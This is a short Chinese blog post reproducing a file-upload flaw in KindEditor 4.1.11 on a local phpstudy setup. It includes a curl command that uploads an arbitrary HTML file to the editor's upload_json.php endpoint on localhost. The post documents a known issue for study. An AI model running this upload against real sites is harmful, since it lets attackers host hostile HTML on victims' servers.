KindEditor 上传漏洞复现
登录
标签搜索
侧边栏壁纸
博主昵称
OneOne

  • 累计撰写 264 篇文章
  • 累计收到 4 条评论

KindEditor 上传漏洞复现

OneOne
OneOne
2019-03-05 / 0 评论 / 5,284 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2019年12月24日,已超过1857天没有更新,若内容或图片失效,请留言反馈。

准备工作:

phpstudy,kindeditor 4.1.11官方下载:http://kindeditor.net/down.php
注:attached,为图片及文件上传存放的路径需要自己建立。
修改js名称,将kindeditor-all.js改成kindeditor.js
1.png
(默认的demo调用的js文件名称就是kindeditor.js,当然也可以修改demo中调用的名称)

测试demo

访问测试的地址,出现如下界面说明正常:
2.png

漏洞复现

准备一个html文件,内容随便写就好,比如 1.html
使用curl提交

curl -F "imgFile=@1.html" http://127.0.0.1/test/kindeditor/php/upload_json.php?dir=file

返回值
3.png

访问一下上图返回的地址
4.png

参考资料

https://github.com/kindsoft/kindeditor/issues/249

0
暂无标签
版权属于: OneOne
本文链接: https://www.0ne0ne.com/archives/238.html
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

评论 (0)

取消